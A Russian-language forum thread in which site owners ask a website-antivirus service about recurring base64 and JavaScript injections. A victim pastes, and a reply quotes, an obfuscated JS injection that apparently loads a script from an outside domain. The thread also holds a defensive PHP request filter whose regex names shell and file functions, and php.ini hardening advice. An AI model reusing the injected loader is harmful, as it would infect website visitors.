1 (25-07-2014 17:36:27 отредактировано sharki-13)

Тема: Вопросы по вредоносным вставкам и BASE64

а работает ли антивирус с Base64 Decode?
тобиш я его удаляю из php скрипта,а он всё равно появляется и в итоге выставляет ссылку на ресурс
может ли он бороться с таким явлением?

Re: Вопросы по вредоносным вставкам и BASE64

sharki-13 пишет:

а работает ли антивирус с Base64 Decode?
тобиш я его удаляю из php скрипта,а он всё равно появляется и в итоге выставляет ссылку на ресурс
может ли он бороться с таким явлением?

Он может как минимум сообщать Вам что код опять появился и файл изменился, НО если у вас постоянно появляются вредоносные вставки даже после лечения, то тут надо более серьезно подходить к вопросу - либо у вас ушли доступы к файлам сайта, либо у вас стоит веб-шелл/бекдор, либо бьют через дырки в CMS - все эти варианты необходимо проверить и залечить вручную, максимум применяя утилиты САНТИ. На автомате он Вам тут не поможет, кроме как предупредит.

3

Re: Вопросы по вредоносным вставкам и BASE64

вопрос-пример:
Есть на выходе ненужный текст: <div (бла бла)>< a href=ссылка на чужой ресурс....(бла бла)</a></div>
ввожу начало и конец этой ереси ненужной нажимаю поиск
Вопрос: он ищет строго только этот текст или ещё вдобавок на всякий случай перекодирует и ищет данную вставку на кодировку base64 ?
Если да, то это круто, продолжайте в том же духе, если нет, то когда планируется ввести автоматизацию этого процесса в санти поиск по вставкам?

Чебоксарский машиностроительный техникум  защищен САНТИ wink

Re: Вопросы по вредоносным вставкам и BASE64

mashteh пишет:

вопрос-пример:
Есть на выходе ненужный текст: <div (бла бла)>< a href=ссылка на чужой ресурс....(бла бла)</a></div>
ввожу начало и конец этой ереси ненужной нажимаю поиск
Вопрос: он ищет строго только этот текст или ещё вдобавок на всякий случай перекодирует и ищет данную вставку на кодировку base64 ?
Если да, то это круто, продолжайте в том же духе, если нет, то когда планируется ввести автоматизацию этого процесса в санти поиск по вставкам?

Сегодня перекодировки не происходит, происходит поиск исключительно строки начинающейся и заканчивающейся на то, что вы задали. В последующем будет использоваться поиск вредоносов на основе ClamAV антивируса, там будет происходить раскодировка при поиске вредоносов. Срок релиза пока озвучивать не будем.

Спасибо.

5 (08-08-2014 22:59:44 отредактировано Lexus34)

Re: Вопросы по вредоносным вставкам и BASE64

Привет всем ! ребят помогите, третий раз умудряются пропатчить все js скрипты, в конец кода добавляется непонятно чем убфусцированная вставка вида:

-----------------------------------------------------
var I=/*@cc_on!@*/false || !!document.documentMode;if(I||F||window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$$$+$.__+$.__+$.__$+".\\"+$.__$+$.$$_+$._$_+$._+"/\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$$+$.__+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"'></\\"+$.__$+$.$$_+$._$$+"\\\"+\\\""+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();}

--------------------------------------------------------------------

Пароли менялись не однократно, видимо уязвимость CMS, сайт гибридный, за основу брали янку, потом уже правили под нужы клиента, сайт делался под заказ и найти разработчиков не представляется возможным.
Заблокировал админку движка по IP через htaccess, отключил SSH, FTP до востребования, установил Санти, настроил, ввел фильтрацию запросов:

--------------------------------------------------------------------
<?php

$patt = "~\<\?~i";

if (is_array($_FILES)) {
foreach($_FILES as $anystring=>$file_data) {
if (preg_match($patt,file_get_contents($file_data['tmp_name']))) die("denied by antivirus-alarm 3");
}
}

$patt = "~\/\.\.\/\.\.\/\.\.\/|{0-9a-zA-Z}[80]|eval[^\(]*\(|include[^\(]*\(|base64_decode[^\(]*\(|stripslashes[^\(]*\(|strip_tags[^\(]*\(|fopen[^\(]*\(|chmod[^\(]*\(|chown[^\(]*\(|chgrp[^\(]*\(|unlink[^\(]*\(|unset[^\(]*\(|fgetc[^\(]*\(|fgets[^\(]*\(|file_get_contents[^\(]*\(|file_put_contents[^\(]*\(|fwrite[^\(]*\(|move_uploaded_file[^\(]*\(|is_uploaded_file[^\(]*\(|rmdir[^\(]*\(|fromCharCode[^\(]*\(|tmpfile[^\(]*\(|tempnam[^\(]*\(|phpinfo[^\(]*\(|basename[^\(]*\(|curl_init[^\(]*\(|socket_create[^\(]*\(|popen[^\(]*\(|exec[^\(]*\(|system[^\(]*\(|passthru[^\(]*\(|proc_open[^\(]*\(|gzuncompress[^\(]*\(|shell_exec[^\(]*\(|delete from|insert into~i";


foreach ($_REQUEST as $v1x1) prfilter_x1($v1x1,$patt);

function prfilter_x1($v1x1,$patt) {

ob_start();

if (is_array($v1x1)) {
foreach ($v1x1 as $vx) prfilter_x1($vx,$patt);
}
else {   

if ( preg_match($patt, $v1x1) || preg_match($patt, stripslashes($v1x1) ) ) die("denied by antivirus-alarm 1");
if ( preg_match($patt, base64_decode($v1x1) ) || preg_match($patt, stripslashes(base64_decode($v1x1) ) ) ) die("denied by antivirus-alarm 2");

}

ob_end_clean();

}

?>

-------------------------------------------------------------------------

Может быть есть еще какие нибудь рекомендации по предотвращению этого беспредела ? Начальство бушует, не хочется терять работу.

Re: Вопросы по вредоносным вставкам и BASE64

Lexus34 пишет:

Привет всем ! ребят помогите, третий раз умудряются пропатчить все js скрипты, в конец кода добавляется непонятно чем убфусцированная вставка вида:

-----------------------------------------------------
var I=/*@cc_on!@*/false || !!document.documentMode;if(I||F||window.opera){$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$$$+$.__+$.__+$.__$+".\\"+$.__$+$.$$_+$._$_+$._+"/\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$$+$.__+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"'></\\"+$.__$+$.$$_+$._$$+"\\\"+\\\""+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();}

--------------------------------------------------------------------

Пароли менялись не однократно, видимо уязвимость CMS, сайт гибридный, за основу брали янку, потом уже правили под нужы клиента, сайт делался под заказ и найти разработчиков не представляется возможным.
Заблокировал админку движка по IP через htaccess, отключил SSH, FTP до востребования, установил Санти, настроил, ввел фильтрацию запросов:

--------------------------------------------------------------------
<?php

$patt = "~\<\?~i";

if (is_array($_FILES)) {
foreach($_FILES as $anystring=>$file_data) {
if (preg_match($patt,file_get_contents($file_data['tmp_name']))) die("denied by antivirus-alarm 3");
}
}

$patt = "~\/\.\.\/\.\.\/\.\.\/|{0-9a-zA-Z}[80]|eval[^\(]*\(|include[^\(]*\(|base64_decode[^\(]*\(|stripslashes[^\(]*\(|strip_tags[^\(]*\(|fopen[^\(]*\(|chmod[^\(]*\(|chown[^\(]*\(|chgrp[^\(]*\(|unlink[^\(]*\(|unset[^\(]*\(|fgetc[^\(]*\(|fgets[^\(]*\(|file_get_contents[^\(]*\(|file_put_contents[^\(]*\(|fwrite[^\(]*\(|move_uploaded_file[^\(]*\(|is_uploaded_file[^\(]*\(|rmdir[^\(]*\(|fromCharCode[^\(]*\(|tmpfile[^\(]*\(|tempnam[^\(]*\(|phpinfo[^\(]*\(|basename[^\(]*\(|curl_init[^\(]*\(|socket_create[^\(]*\(|popen[^\(]*\(|exec[^\(]*\(|system[^\(]*\(|passthru[^\(]*\(|proc_open[^\(]*\(|gzuncompress[^\(]*\(|shell_exec[^\(]*\(|delete from|insert into~i";


foreach ($_REQUEST as $v1x1) prfilter_x1($v1x1,$patt);

function prfilter_x1($v1x1,$patt) {

ob_start();

if (is_array($v1x1)) {
foreach ($v1x1 as $vx) prfilter_x1($vx,$patt);
}
else {   

if ( preg_match($patt, $v1x1) || preg_match($patt, stripslashes($v1x1) ) ) die("denied by antivirus-alarm 1");
if ( preg_match($patt, base64_decode($v1x1) ) || preg_match($patt, stripslashes(base64_decode($v1x1) ) ) ) die("denied by antivirus-alarm 2");

}

ob_end_clean();

}

?>

-------------------------------------------------------------------------

Может быть есть еще какие нибудь рекомендации по предотвращению этого беспредела ? Начальство бушует, не хочется терять работу.

Добрый день. Если код сайта огромен и его проверку на предмет уязвимостей и исправление нет возможности/желания делать, то естественно взломы будут продолжаться. Мой совет - отключите тогда хотя бы функции PHP, которые помогают вредителям работать с файлами, консолью и т.д.. Отключение производится с администраторами хостинга, либо самостоятельно - если есть доступ к php.ini. В нем надо прописать строки вида:

allow_url_fopen = Off
allow_url_include = Off
expose_php = Off
magic_quotes_gpc = On
register_globals = Off
memory_limit = 1011M
disable_functions = popen,exec,system,passthru,proc_open,shell_exec,ini_restore,dl,symlink,chgrp,putenv,getmyuid,posix_setuid,posix_setsid,posix_setpgid,posix_kill,apache_child_terminate,chmod,pcntl_exec,phpinfo,virtual,proc_close,proc_get_status,proc_terminate,proc_nice,getmygid,proc_getstatus,proc_close,escapeshellarg,show_source,pclose,safe_dir,dl,ini_restore,chown,chgrp,shown_source,mysql_list_dbs,get_current_user,getmyid,leak,pfsockopen,get_current_user,syslog

7

Re: Вопросы по вредоносным вставкам и BASE64

Тогда я пожалуй просто перенесу этот сайт на один из серверов этой же организации и поменяю DNS. Спасибо за параметры php.ini